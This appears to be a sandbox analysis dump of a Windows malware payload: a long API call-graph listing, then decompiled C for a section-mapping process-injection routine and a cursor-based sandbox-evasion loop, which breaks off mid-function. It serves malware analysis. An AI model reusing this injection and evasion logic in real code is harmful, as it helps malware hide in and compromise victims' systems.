3214->3161 3216 4021c6 3215->3216 3217 40228a 3215->3217 3266 402603 3216->3266 3245 12ae040 3217->3245 3251 12ae018 3217->3251 3257 12a1129 3217->3257 3220 40229d GetLastError 3221 4022a6 3220->3221 3221->3170 3224 4021fb memcpy 3225 40223d 3224->3225 3274 4025c0 3225->3274 3228 402285 3228->3220 3228->3221 3229 40227e RtlNtStatusToDosError 3229->3228 3617 401fbb 3233->3617 3236 402603 2 API calls 3237 402099 3236->3237 3238 4020a1 GetLastError 3237->3238 3241 4020ac 3237->3241 3243 402125 3238->3243 3239 4020d6 3239->3170 3240 40217f GetLastError 3240->3239 3241->3239 3242 4025c0 2 API calls 3241->3242 3242->3243 3243->3239 3243->3240 3244->3162 3247 12ae25c 3245->3247 3250 12ae05f 3245->3250 3246 12ae1bc NtProtectVirtualMemory 3246->3247 3248 12ae1ee 3246->3248 3247->3228 3248->3247 3249 12ae22d NtProtectVirtualMemory 3248->3249 3249->3247 3249->3248 3250->3246 3250->3247 3256 12ae042 3251->3256 3252 12ae1bc NtProtectVirtualMemory 3253 12ae25c 3252->3253 3254 12ae1ee 3252->3254 3253->3228 
3254->3253 3255 12ae22d NtProtectVirtualMemory 3254->3255 3255->3253 3255->3254 3256->3252 3256->3253 3258 12a1159 InterlockedDecrement 3257->3258 3259 12a1136 3257->3259 3261 12a1151 3258->3261 3262 12a1168 3258->3262 3260 12a1139 InterlockedIncrement 3259->3260 3259->3261 3260->3261 3263 12a1148 3260->3263 3261->3228 3290 12a10d5 3262->3290 3278 12a102a HeapCreate 3263->3278 3267 4021d7 3266->3267 3268 402615 3266->3268 3267->3220 3270 40259f 3267->3270 3268->3267 3269 40263a RtlNtStatusToDosError SetLastError 3268->3269 3269->3267 3271 4025ac RtlNtStatusToDosError 3270->3271 3272 4021f0 3270->3272 3271->3272 3272->3224 3272->3228 3275 4025cc 3274->3275 3276 4025ef RtlNtStatusToDosError SetLastError 3275->3276 3277 402260 3275->3277 3276->3277 3277->3221 3277->3228 3277->3229 3279 12a104e GetTickCount 3278->3279 3280 12a1046 3278->3280 3299 12a3887 CreateEventA 3279->3299 3280->3261 3285 12a10a9 3287 12a10b8 3285->3287 3288 12a10ad IsWow64Process 3285->3288 3286 12a1084 GetModuleHandleA GetProcAddress 3286->3285 3286->3287 3314 12a1e67 3287->3314 3288->3287 3291 12a10de SetEvent 3290->3291 3292 12a1126 3290->3292 3293 12a10eb SleepEx 3291->3293 3292->3261 3294 12a10fe 3293->3294 3295 12a1105 3293->3295 3294->3293 3294->3295 3296 12a110f CloseHandle 3295->3296 3297 12a1116 3295->3297 3296->3297 3297->3292 3298 12a111f HeapDestroy 3297->3298 3298->3292 3300 12a389e GetVersion 3299->3300 3301 12a38f1 GetLastError 3299->3301 3302 12a38a8 3300->3302 3303 12a1061 3301->3303 3304 12a38b0 GetCurrentProcessId OpenProcess 3302->3304 3305 12a38e1 3302->3305 3303->3280 3306 12a39eb lstrcpyn 3303->3306 3304->3305 3305->3303 3307 12a3a2c 3306->3307 3308 12a106d 3307->3308 3309 12a3a64 VirtualAlloc 3307->3309 3308->3280 3308->3285 3308->3286 3309->3308 3310 12a3a94 3309->3310 3311 12a3aca memcpy 3310->3311 3312 12a3adb 3310->3312 3313 12a3ae2 VirtualFree 3311->3313 3312->3313 3313->3308 3329 12a3b68 NtOpenProcess 3314->3329 3318 12a1ed6 3319 12a1f0a 3318->3319 3320 12a1edf 
memset RtlInitializeCriticalSection 3318->3320 3328 12a1ebb 3319->3328 3342 12a44a2 3319->3342 3320->3319 3324 12a1f20 3325 12a1f26 CoInitializeEx 3324->3325 3324->3328 3326 12a1f35 3325->3326 3326->3328 3369 12a1cce CreateWaitableTimerA 3326->3369 3328->3280 3330 12a1e91 3329->3330 3331 12a3bb9 NtOpenProcessToken 3329->3331 3330->3328 3341 12a1000 RtlAllocateHeap 3330->3341 3332 12a3bcc NtQueryInformationToken 3331->3332 3333 12a3c21 NtClose 3331->3333 3387 12a1000 RtlAllocateHeap 3332->3387 3333->3330 3335 12a3be8 3336 12a3bee NtQueryInformationToken 3335->3336 3337 12a3c17 NtClose 3335->3337 3338 12a3c11 3336->3338 3339 12a3c01 memcpy 3336->3339 3337->3333 3388 12a1015 HeapFree 3338->3388 3339->3338 3341->3318 3343 12a44c1 3342->3343 3344 12a4516 GetComputerNameW 3343->3344 3345 12a44d5 RtlAllocateHeap 3343->3345 3346 12a452b RtlAllocateHeap 3344->3346 3347 12a1f1b 3344->3347 3345->3344 3351 12a44ec 3345->3351 3346->3347 3348 12a4541 GetComputerNameW 3346->3348 3353 12a1173 3347->3353 3349 12a455f HeapFree 3348->3349 3350 12a4550 3348->3350 3349->3347 3350->3349 3352 12a4506 HeapFree 3351->3352 3352->3344 3389 12a3f5e 3353->3389 3356 12a3f5e 3 API calls 3358 12a11b4 3356->3358 3357 12a1343 3357->3324 3358->3357 3362 12a12f5 3358->3362 3396 12a433c lstrlen 3358->3396 3361 12a12ef 3402 12a46ae RtlEnterCriticalSection 3361->3402 3363 12a132e HeapFree 3362->3363 3365 12a433c 4 API calls 3362->3365 3363->3324 3366 12a131b 3365->3366 3366->3363 3367 12a131f 3366->3367 3408 12a4590 RtlEnterCriticalSection 3367->3408 3370 12a1d01 3369->3370 3371 12a1e56 GetLastError 3369->3371 3373 12a1d31 WaitForMultipleObjects 3370->3373 3372 12a1e5e 3371->3372 3372->3328 3374 12a1d50 3373->3374 3385 12a1dab 3373->3385 3427 12a1c40 3374->3427 3376 12a1db7 HeapFree 3376->3385 3377 12a1dcb CloseHandle 3377->3372 3379 12a1d55 3380 12a1da2 3379->3380 3381 12a1dea 3379->3381 3382 12a1e1b _allmul 3379->3382 3379->3385 3440 12a1b3f RtlAllocateHeap 3379->3440 3450 12a19e0 3380->3450 
3381->3382 3481 12a45f0 RtlEnterCriticalSection 3381->3481 3386 12a1e37 WaitForMultipleObjects 3382->3386 3385->3376 3385->3377 3386->3379 3386->3385 3387->3335 3388->3337 3394 12a3f99 3389->3394 3391 12a4011 3392 12a403f memcpy 3391->3392 3393 12a1190 3391->3393 3392->3393 3393->3356 3394->3391 3394->3393 3416 12a1000 RtlAllocateHeap 3394->3416 3417 12a1015 HeapFree 3394->3417 3397 12a4351 3396->3397 3418 12a1000 RtlAllocateHeap 3397->3418 3399 12a435c 3400 12a12eb 3399->3400 3401 12a4362 memcpy memset 3399->3401 3400->3361 3400->3362 3401->3400 3403 12a46c7 3402->3403 3404 12a46bf Sleep 3403->3404 3406 12a46d3 3403->3406 3404->3403 3405 12a46fa RtlLeaveCriticalSection 3405->3362 3406->3405 3407 12a46e6 HeapFree 3406->3407 3407->3405 3409 12a45a9 3408->3409 3410 12a45a1 Sleep 3409->3410 3411 12a45b5 3409->3411 3410->3409 3412 12a45d1 3411->3412 3413 12a45c2 HeapFree 3411->3413 3419 12a4420 3412->3419 3413->3412 3416->3394 3417->3394 3418->3399 3420 12a4435 3419->3420 3421 12a1000 RtlAllocateHeap 3420->3421 3422 12a444b 3421->3422 3423 12a4453 StrTrimA 3422->3423 3424 12a448a RtlLeaveCriticalSection 3422->3424 3425 12a4461 3423->3425 3424->3363 3425->3424 3426 12a446c StrTrimA 3425->3426 3426->3425 3486 12a2629 3427->3486 3430 12a1cc8 3430->3379 3433 12a1c6c GetModuleHandleA 3434 12a1c7b 3433->3434 3437 12a1c95 3433->3437 3436 12a1bc6 11 API calls 3434->3436 3434->3437 3436->3437 3503 12a2544 SysAllocString 3437->3503 3441 12a1b5e 3440->3441 3442 12a1b6f 3440->3442 3509 12a4a4e 3441->3509 3444 12a1bb3 3442->3444 3543 12a49c1 3442->3543 3444->3379 3447 12a1b8a 3448 12a45f0 3 API calls 3447->3448 3449 12a1ba2 HeapFree 3448->3449 3449->3444 3555 12a1348 3450->3555 3455 12a1a21 3604 12a1000 RtlAllocateHeap 3455->3604 3456 12a1a3d 3575 12a18f4 3456->3575 3457 12a1a54 3459 12a18f4 4 API calls 3457->3459 3462 12a1a45 3459->3462 3461 12a1b10 3472 12a20aa 4 API calls 3461->3472 3474 12a1a02 3461->3474 3462->3455 3583 12a15ad 3462->3583 3463 12a1ab3 3463->3461 3465 12a1b0a 
3463->3465 3466 12a1ad0 lstrlenW 3463->3466 3616 12a1015 HeapFree 3465->3616 3605 12a1000 RtlAllocateHeap 3466->3605 3470 12a1ae1 3470->3465 3606 12a20aa 3470->3606 3471 12a2629 4 API calls 3473 12a1a82 3471->3473 3472->3474 3473->3455 3592 12a41a7 3473->3592 3474->3385 3482 12a4609 3481->3482 3483 12a4601 Sleep 3482->3483 3485 12a4615 RtlLeaveCriticalSection 3482->3485 3483->3482 3485->3381 3487 12a1000 RtlAllocateHeap 3486->3487 3488 12a2635 3487->3488 3489 12a1c50 3488->3489 3490 12a21c4 CoCreateInstance CoSetProxyBlanket 3488->3490 3489->3430 3493 12a1bc6 3489->3493 3492 12a2641 3490->3492 3491 12a1015 HeapFree 3491->3489 3492->3489 3492->3491 3494 12a4387 RtlAllocateHeap lstrlen mbstowcs memset 3493->3494 3495 12a1bd9 3494->3495 3496 12a24fe SysFreeString SysFreeString 3495->3496 3497 12a1c34 3495->3497 3498 12a1bf2 3496->3498 3497->3433 3497->3437 3499 12a1bf8 GetSystemTimeAsFileTime 3498->3499 3500 12a1c23 HeapFree 3498->3500 3501 12a25a8 SysFreeString SysFreeString SafeArrayCreate memcpy SafeArrayDestroy 3499->3501 3500->3497 3502 12a1c21 3501->3502 3502->3500 3504 12a256a 3503->3504 3505 12a1cb1 3503->3505 3506 12a2371 SysFreeString SysFreeString 3504->3506 3508 12a1015 HeapFree 3505->3508 3507 12a2592 SysFreeString 3506->3507 3507->3505 3508->3430 3510 12a4a68 RtlQueryPerformanceFrequency RtlQueryPerformanceCounter _aulldiv 3509->3510 3512 12a4ae6 3510->3512 3513 12a4642 9 API calls 3512->3513 3514 12a4afc 3513->3514 3515 12a4b09 RtlAllocateHeap 3514->3515 3516 12a4cdf HeapFree 3514->3516 3517 12a4b28 3515->3517 3518 12a4ccf HeapFree 3515->3518 3516->3442 3519 12a4b2f RtlEnterCriticalSection RtlLeaveCriticalSection 3517->3519 3518->3516 3520 12a491d 14 API calls 3519->3520 3521 12a4b6b 3520->3521 3522 12a4cc1 HeapFree 3521->3522 3523 12a4b87 StrTrimA 3521->3523 3522->3518 3524 12a42f8 RtlAllocateHeap lstrcpy lstrcat 3523->3524 3526 12a4b99 3524->3526 3525 12a4cb3 HeapFree 3525->3522 3526->3525 3527 12a4387 RtlAllocateHeap lstrlen mbstowcs memset 
3526->3527 3528 12a4bd0 3527->3528 3529 12a4c72 3528->3529 3530 12a5103 RtlAllocateHeap HeapFree CoCreateInstance 3528->3530 3531 12a4ca0 HeapFree 3529->3531 3533 12a4c8d 3529->3533 3532 12a4be4 3530->3532 3531->3525 3534 12a4c2c 3532->3534 3536 12a4f8d 15 API calls 3532->3536 3535 12a45f0 RtlEnterCriticalSection Sleep RtlLeaveCriticalSection 3533->3535 3537 12a4c65 3534->3537 3539 12a4c4c wcstombs 3534->3539 3535->3531 3538 12a4bfd 3536->3538 3540 12a1015 HeapFree 3537->3540 3542 12a1015 HeapFree 3538->3542 3541 12a54f6 memcpy 3539->3541 3540->3529 3541->3537 3542->3534 3544 12a1000 RtlAllocateHeap 3543->3544 3545 12a49d5 3544->3545 3546 12a49db memcpy 3545->3546 3547 12a1b86 3545->3547 3548 12a49f4 3546->3548 3547->3444 3547->3447 3549 12a52e2 26 API calls 3548->3549 3550 12a4a10 memset 3549->3550 3551 12a1015 HeapFree 3550->3551 3552 12a4a24 3551->3552 3552->3547 3553 12a4a28 memcpy 3552->3553 3554 12a1015 HeapFree 3553->3554 3554->3547 3556 12a3ed0 19 API calls 3555->3556 3557 12a136a 3556->3557 3558 12a1000 RtlAllocateHeap 3557->3558 3562 12a1409 3557->3562 3559 12a1384 3558->3559 3560 12a138a wsprintfA lstrlen 3559->3560 3559->3562 3561 12a1000 RtlAllocateHeap 3560->3561 3563 12a13ea 3561->3563 3562->3474 3567 12a3922 3562->3567 3564 12a1403 3563->3564 3565 12a13f0 lstrcpy lstrcat 3563->3565 3566 12a1015 HeapFree 3564->3566 3565->3564 3566->3562 3568 12a1a13 3567->3568 3569 12a3943 3567->3569 3568->3455 3568->3456 3568->3457 3569->3568 3570 12a39d1 CloseHandle 3569->3570 3571 12a1000 RtlAllocateHeap 3569->3571 3570->3568 3573 12a3994 3571->3573 3572 12a39d0 3572->3570 3573->3572 3574 12a1015 HeapFree 3573->3574 3574->3572 3576 12a191a 3575->3576 3577 12a19c4 3576->3577 3578 12a1000 RtlAllocateHeap 3576->3578 3577->3462 3579 12a1960 3578->3579 3579->3577 3580 12a1966 memset memcpy 3579->3580 3580->3577 3581 12a198f 3580->3581 3581->3577 3582 12a19a7 memcpy 3581->3582 3582->3581 3584 12a15bd 3583->3584 3585 12a161f 3583->3585 3584->3585 3586 12a407c lstrcmp 
lstrlen 3584->3586 3585->3455 3585->3471 3587 12a15c9 3586->3587 3587->3585 3588 12a150b RtlAllocateHeap 3587->3588 3589 12a15ee 3588->3589 3589->3585 3590 12a1422 6 API calls 3589->3590 3591 12a160a HeapFree 3590->3591 3591->3585 3593 12a41d3 3592->3593 3594 12a1a91 3593->3594 3595 12a1000 RtlAllocateHeap 3593->3595 3603 12a1015 HeapFree 3594->3603 3596 12a41ec 3595->3596 3596->3594 3597 12a4253 3596->3597 3598 12a174a 22 API calls 3596->3598 3600 12a427a WaitForSingleObject 3596->3600 3601 12a1015 HeapFree 3596->3601 3602 12a1000 RtlAllocateHeap 3596->3602 3599 12a1015 HeapFree 3597->3599 3598->3596 3599->3594 3600->3596 3600->3597 3601->3596 3602->3596 3603->3455 3604->3463 3605->3470 3607 12a1f62 CoCreateInstance 3606->3607 3614 12a20da 3607->3614 3608 12a1b04 3615 12a1015 HeapFree 3608->3615 3609 12a218d 3611 12a219b 3609->3611 3612 12a2192 SysFreeString 3609->3612 3610 12a2184 SysFreeString 3610->3609 3611->3608 3613 12a21a0 SysFreeString 3611->3613 3612->3611 3613->3608 3614->3608 3614->3609 3614->3610 3615->3465 3616->3461 3618 40202a memcpy 3617->3618 3619 401fc9 3617->3619 3618->3236 3627 40244e 3619->3627 3621 401fd9 3622 40244e 16 API calls 3621->3622 3623 401ff4 3622->3623 3624 40244e 16 API calls 3623->3624 3625 40200f 3624->3625 3626 40244e 16 API calls 3625->3626 3626->3618 3628 40245a 3627->3628 3639 40231b 3628->3639 3631 40247f VirtualAlloc 3634 402497 3631->3634 3638 4024db 3631->3638 3632 402519 3632->3621 3633 40250a VirtualFree 3633->3632 3636 4024cb 3634->3636 3652 401d4b 3634->3652 3637 4027db 2 API calls 3636->3637 3637->3638 3638->3632 3638->3633 3655 401d9f GetProcAddress 3639->3655 3642 402360 3643 401d9f 5 API calls 3642->3643 3646 40239e 3642->3646 3647 40237e VirtualFree VirtualAlloc 3642->3647 3643->3642 3644 402440 3644->3631 3644->3638 3645 402432 VirtualFree 3645->3644 3648 4023bf lstrcmpiA 3646->3648 3651 402401 3646->3651 3647->3642 3647->3646 3649 4023d3 StrChrA 3648->3649 3648->3651 3649->3646 3650 4023e0 lstrcmpiA 3649->3650 
3650->3646 3650->3651 3651->3644 3651->3645 3653 401d62 GetProcAddress 3652->3653 3654 401d7c 3652->3654 3653->3654 3654->3634 3656 401dcb 3655->3656 3657 401f98 VirtualAlloc 3655->3657 3656->3657 3672 401046 HeapAlloc 3656->3672 3657->3642 3657->3651 3659 401ded 3659->3657 3673 401046 HeapAlloc 3659->3673 3661 401e02 3662 401f77 3661->3662 3663 401d4b GetProcAddress 3661->3663 3674 40105b HeapFree 3662->3674 3665 401e1a 3663->3665 3665->3662 3668 401d4b GetProcAddress 3665->3668 3666 401f8e 3666->3657 3675 40105b HeapFree 3666->3675 3670 401e36 3668->3670 3669 401d4b GetProcAddress 3669->3670 3670->3662 3670->3669 3671 401f36 StrRChrA 3670->3671 3671->3670 3672->3659 3673->3661 3674->3666 3675->3657 3676 12a8eaa 3677 12a8e76 3676->3677 3679 12a877b 3677->3679 3680 12a87e2 RaiseException 3679->3680 3681 12a8801 3679->3681 3683 12a898f 3680->3683 3682 12a886e LoadLibraryA 3681->3682 3681->3683 3684 12a88be InterlockedExchange 3681->3684 3686 12a88e0 3681->3686 3682->3684 3685 12a887d GetLastError 3682->3685 3683->3677 3689 12a88cc 3684->3689 3690 12a88f2 FreeLibrary 3684->3690 3688 12a889d RaiseException 3685->3688 3693 12a888f 3685->3693 3686->3683 3687 12a8944 GetProcAddress 3686->3687 3687->3683 3691 12a8954 GetLastError 3687->3691 3688->3683 3689->3686 3692 12a88d2 LocalAlloc 3689->3692 3690->3686 3694 12a8966 3691->3694 3692->3686 3693->3684 3693->3688 3694->3683 3695 12a8974 RaiseException 3694->3695 3695->3683 3776 402d80 3777 402d9e 3776->3777 3779 402e34 __except_handler3 3776->3779 3778 402f99 __except_handler3 NtQueryVirtualMemory 3777->3778 3781 402db9 __except_handler3 3778->3781 3780 402e84 __except_handler3 RtlUnwind 3780->3781 3781->3779 3781->3780 3785 12a89e7 3786 12a89c2 3785->3786 3786->3785 3787 12a877b ___delayLoadHelper2@8 10 API calls 3786->3787 3787->3786 3696 12ae439 3697 12ae451 GetModuleHandleA GetProcAddress 3696->3697 3698 12ae476 3696->3698 3697->3698 3702 12a89bd 3703 12a89c2 3702->3703 3704 12a877b ___delayLoadHelper2@8 10 API calls 
3703->3704 3704->3703 3711 12ae30b lstrcpyn 3713 12ae350 3711->3713 3712 12ae416 3713->3712 3714 12ae388 VirtualAlloc 3713->3714 3714->3712 3715 12ae3b8 3714->3715 3716 12ae406 VirtualFree 3715->3716 3716->3712 3717 12ae58e GetProcAddress 3718 12ae5ba 3717->3718 3722 12ae766 3717->3722 3718->3722 3726 12ae53a 3718->3726 3721 12ae53a GetProcAddress 3724 12ae625 3721->3724 3723 12ae53a GetProcAddress 3723->3724 3724->3722 3724->3723 3725 12ae725 StrRChrA 3724->3725 3725->3724 3727 12ae56b 3726->3727 3728 12ae551 GetProcAddress 3726->3728 3727->3721 3727->3722 3728->3727 3729 12ae48e 3731 12ae4a4 3729->3731 3730 12ae529 3731->3730 3732 12ae4cb CreateFileA 3731->3732 3732->3730 3733 12ae4ec SetFilePointer 3732->3733 3734 12ae4fa ReadFile 3733->3734 3735 12ae520 CloseHandle 3733->3735 3734->3735 3736 12ae512 3734->3736 3735->3730 3736->3735 3797 12a875f 3798 12a8764 3797->3798 3799 12a877b ___delayLoadHelper2@8 10 API calls 3798->3799 3800 12a8771 3799->3800 3747 402d78 3748 402d80 3747->3748 3750 402e34 __except_handler3 3748->3750 3753 402f99 3748->3753 3752 402db9 __except_handler3 3752->3750 3757 402e84 RtlUnwind 3752->3757 3754 402fae 3753->3754 3756 402fca 3753->3756 3755 403039 NtQueryVirtualMemory 3754->3755 3754->3756 3755->3756 3756->3752 3756->3756 3758 402e9c 3757->3758 3758->3752 3759 4024f9 3760 402503 3759->3760 3761 40250a VirtualFree 3760->3761 3762 402519 3760->3762 3761->3762 3769 12ae297 CreateEventA 3770 12ae304 GetLastError 3769->3770 3771 12ae2b5 GetVersion 3769->3771 3772 12ae2bf 3771->3772 3773 12ae2c7 GetCurrentProcessId OpenProcess 3772->3773 3774 12ae2ff 3772->3774 3775 12ae2f4 3773->3775

    Executed Functions

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 56 40134b-401371 57 401373-40137a 56->57 58 40138e-401396 56->58 57->58 59 40137c-40138c 57->59 60 401399-40139e 58->60 59->60 61 4013a0-4013a7 60->61 62 4013ac-4013b1 60->62 63 40159d-4015a3 61->63 64 4013b3-4013c2 call 401046 62->64 65 4013e9-40141f call 4015e5 62->65 70 4013d0-4013e7 call 402989 64->70 71 4013c4-4013cb 64->71 72 401425-40144f call 4015a6 65->72 73 401558-40155c 65->73 70->65 74 40157f-401583 71->74 72->73 84 401455-401468 call 4016a4 72->84 76 401570-401574 73->76 77 40155e-40156a NtUnmapViewOfSection RtlNtStatusToDosError 73->77 74->63 81 401585-401598 memset call 40105b 74->81 76->74 80 401576-401579 CloseHandle 76->80 77->76 80->74 81->63 84->73 87 40146e-401473 84->87 88 401481-401486 87->88 89 401475-40147e memcpy 87->89 90 4014b1-4014d4 memcpy 88->90 91 401488-40148e 88->91 89->88 93 4014d6-4014e4 90->93 94 4014e7-4014eb 90->94 91->90 92 401490 91->92 95 401495-4014af 92->95 93->94 96 401503-401507 94->96 97 4014ed-401500 94->97 95->90 98 401492 95->98 99 401509-401510 96->99 100 40151f-401520 call 401203 96->100 97->96 98->95 99->100 101 401512-40151d call 4012ac 99->101 104 401525-40152a 100->104 101->104 104->73 105 40152c-401550 memcpy call 4022ad 104->105 108 401555 105->108 108->73
    C-Code - Quality: 95%
    			E0040134B(void* __esi, intOrPtr* _a4, signed int _a8) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				signed int _v20;
    				void* _v24;
    				int _v28;
    				void* _v32;
    				void* _v36;
    				void* _v40;
    				signed int _v44;
    				signed int _t96;
    				int _t98;
    				intOrPtr _t104;
    				intOrPtr _t113;
    				intOrPtr _t114;
    				int _t115;
    				unsigned int _t116;
    				intOrPtr _t121;
    				intOrPtr _t124;
    				unsigned int _t131;
    				signed int _t133;
    				signed int _t139;
    				void* _t142;
    				void* _t143;
    				void* _t146;
    				intOrPtr _t154;
    				void* _t155;
    				signed int _t158;
    				void* _t161;
    				void* _t162;
    
    				_t161 = __esi;
    				_t96 = _a8 & 0x00000010;
    				_v32 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				_v24 = 0;
    				_v36 = E00401851;
    				_v44 = _t96;
    				if(_t96 != 0 || ( *0x405480 & 0x00000001) == 0) {
    					_v20 =  *_t161;
    					_t98 =  *(_t161 + 0x10);
    					_t155 = _v20;
    				} else {
    					_t155 =  *(__esi + 8);
    					_t98 =  *(__esi + 0x14);
    					_v36 =  &E00405070;
    					_v20 = _t155;
    				}
    				_v28 = _t98;
    				if(_t155 != 0) {
    					if( *_t155 == 0x5a4d) {
    						L10:
    						_t158 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x3c)) + _t155 + 0x50)) + 0x00000fff & 0xfffff000;
    						_t104 = E004015E5( *(_t161 + 0x14) + _t158 +  *(_t161 + 0x10) + 0xc50,  &_v16,  &_v24); // executed
    						_v8 = _t104;
    						if(_t104 != 0) {
    							L30:
    							if(_v16 != 0) {
    								RtlNtStatusToDosError(NtUnmapViewOfSection(0xffffffff, _v16));
    							}
    							if(_v24 != 0) {
    								CloseHandle(_v24);
    							}
    							L34:
    							if(_v32 != 0) {
    								memset(_v32, 0, _v28);
    								E0040105B(_v32);
    							}
    							goto L36;
    						}
    						_t139 =  *0x405498; // 0x736c6e70
    						_t142 = (_t139 ^ 0x736c6220) + _t158 + _v16;
    						_v40 = _t142;
    						_t113 = E004015A6(_v24,  *_a4,  &_v12); // executed
    						_v8 = _t113;
    						if(_t113 != 0) {
    							goto L30;
    						}
    						_t114 = E004016A4(_v16, _v20, _v12);
    						_v8 = _t114;
    						if(_t114 != 0) {
    							goto L30;
    						}
    						_t115 =  *(_t161 + 0x10);
    						if(_t115 != 0) {
    							memcpy(_t142,  *_t161, _t115);
    							_t162 = _t162 + 0xc;
    						}
    						_t116 =  *(_t161 + 0x14);
    						if(_t116 == 0) {
    							L20:
    							_t143 = _v16 + _t158;
    							asm("cdq");
    							 *((intOrPtr*)(_t143 + 0x30)) = _v12;
    							 *((intOrPtr*)(_t143 + 0x34)) = _t154;
    							memcpy(_t143 + 0x18, _t161, 0x18);
    							_t162 = _t162 + 0xc;
    							if( *(_t161 + 0x10) != 0) {
    								asm("cdq");
    								 *(_t143 + 0x18) = _t158 + _v12 + 0xc50;
    								 *((intOrPtr*)(_t143 + 0x1c)) = _t154;
    							}
    							if( *(_t161 + 0x14) != 0) {
    								asm("cdq");
    								 *((intOrPtr*)(_t143 + 0x20)) = _v12 + _t158 +  *(_t161 + 0x10) + 0xc50;
    								 *((intOrPtr*)(_t143 + 0x24)) = _t154;
    							}
    							if(_v44 != 0 || ( *0x405480 & 0x00000001) == 0) {
    								_t121 = E00401203(_t154, _t143);
    							} else {
    								_push( *_a4);
    								_t121 = E004012AC(_t154, _t143);
    							}
    							_v8 = _t121;
    							if(_t121 == 0) {
    								memcpy(_t143 + 0x40, _v36, 0x800);
    								_t162 = _t162 + 0xc;
    								_t124 = E004022AD(_t154, _a4, _t158 + _v12 + 0x40, _t158 + _v12, _a8); // executed
    								_v8 = _t124;
    							}
    							goto L30;
    						} else {
    							_t131 = _t116 >> 2;
    							_v20 = _t131;
    							if(_t131 == 0) {
    								goto L20;
    							}
    							while(1) {
    								_t133 = _v20 << 2;
    								_t49 =  &_v20;
    								 *_t49 = _v20 - 1;
    								_t154 = _t142 + _t133;
    								 *((intOrPtr*)(_t154 +  *(_t161 + 0x10) - 4)) =  *((intOrPtr*)(_t133 +  *((intOrPtr*)(_t161 + 8)) - 4));
    								if( *_t49 == 0) {
    									goto L20;
    								}
    								_t142 = _v40;
    							}
    							goto L20;
    						}
    					}
    					_t146 = E00401046(_v28);
    					_v32 = _t146;
    					if(_t146 != 0) {
    						E00402989(_t146, _t155, _v28,  *0x405494, 0);
    						_v20 = _t146;
    						_t155 = _t146;
    						goto L10;
    					} else {
    						_v8 = 8;
    						goto L34;
    					}
    				} else {
    					_v8 = 2;
    					L36:
    					return _v8;
    				}
    			}

    APIs
      • Part of subcall function 004015E5: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 00401640
      • Part of subcall function 004015E5: memset.NTDLL ref: 00401665
      • Part of subcall function 004015E5: RtlNtStatusToDosError.NTDLL(00000000), ref: 00401681
      • Part of subcall function 004015E5: ZwClose.NTDLL(?), ref: 00401695
    • memcpy.NTDLL(?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401479
    • memcpy.NTDLL(?,?,00000018,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004014C8
      • Part of subcall function 00401203: GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00401525,?,?,?,00000000), ref: 00401236
      • Part of subcall function 00401203: memcpy.NTDLL(?,3!Pw,00000018,ZwProtectVirtualMemory,LdrGetProcedureAddress,LdrLoadDll), ref: 0040129D
    • memcpy.NTDLL(?,00401851,00000800,?,?,?,00000000), ref: 00401538
      • Part of subcall function 004022AD: memset.NTDLL ref: 004022CC
      • Part of subcall function 004012AC: memcpy.NTDLL(?,0040545C,00000018,?,ZwProtectVirtualMemory,?,LdrGetProcedureAddress,?,LdrLoadDll,?,0040151D,?,?,?,?,00000000), ref: 0040133D
    • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00401563
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 0040156A
    • CloseHandle.KERNEL32(00000000), ref: 00401579
    • memset.NTDLL ref: 0040158D
      • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,0040275E), ref: 00401067
      • Part of subcall function 004015A6: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 004015D3
      • Part of subcall function 004015A6: RtlNtStatusToDosError.NTDLL(00000000), ref: 004015DA
      • Part of subcall function 004016A4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,00000000), ref: 00401704
      • Part of subcall function 004016A4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,00000000), ref: 00401719
      • Part of subcall function 004016A4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?), ref: 0040175B
      • Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,0040272F,?,?,00000000,?,00000006,00000006,?,00401128,?,?,736C6E70,?,00000000), ref: 00401052
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd

Control-flow graph for function 00401070 (basic blocks 00401070-00401202; legend: Executed / Not Executed): rendered graph omitted
    C-Code - Quality: 98%
    			E00401070() {
    				unsigned int _v12;
    				void _v28;
    				long _v32;
    				intOrPtr _v36;
    				struct tagPOINT _v44;
    				signed int _v48;
    				struct tagPOINT _v56;
    				signed int _v60;
    				void* __esi;
    				void* _t41;
    				int _t42;
    				signed int _t45;
    				unsigned int _t50;
    				long _t51;
    				intOrPtr _t52;
    				long _t54;
    				int _t57;
    				signed int _t60;
    				int _t69;
    				signed int _t72;
    				signed int _t74;
    				long _t76;
    				signed int _t77;
    				signed char* _t78;
    				int* _t81;
    				signed int* _t87;
    				void* _t88;
    				int _t90;
    				signed int _t93;
    
    				_v48 = _v48 & 0x00000000;
    				_t90 = E00401AA8();
    				if(_t90 != 0) {
    					L21:
    					if( *0x40548c == 0) {
    						return _t90;
    					}
    					ExitProcess(_t90);
    				}
    				GetCursorPos( &_v44);
    				_t90 = 0xc;
    				while(WaitForSingleObject( *0x405474, 0x40) != 0) {
    					GetCursorPos( &_v56);
    					_t73 = _v44.y ^ _v44.x;
    					_t69 = E00401B1C((_v56.y ^ _v56.x) - (_v44.y ^ _v44.x) & 0x0000001f); // executed
    					_t90 = _t69;
    					if(_t90 == 0xc) {
    						continue;
    					}
    					break;
    				}
    				if(_t90 != 0) {
    					goto L21;
    				}
    				_t41 = E00401C4A(_t73); // executed
